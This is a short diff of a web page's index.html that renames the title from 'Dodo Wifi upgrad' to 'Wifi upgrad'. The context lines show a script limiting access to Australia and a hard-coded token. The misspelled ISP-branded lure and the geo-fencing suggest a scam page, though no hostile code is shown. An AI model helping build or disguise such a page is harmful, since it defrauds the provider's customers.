--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <title>Dodo Wifi upgrad</title>
+  <title>Wifi upgrad</title>
   <script>
     const allowedCountry = 'AU';
     const token = "3a5e08c892d837";
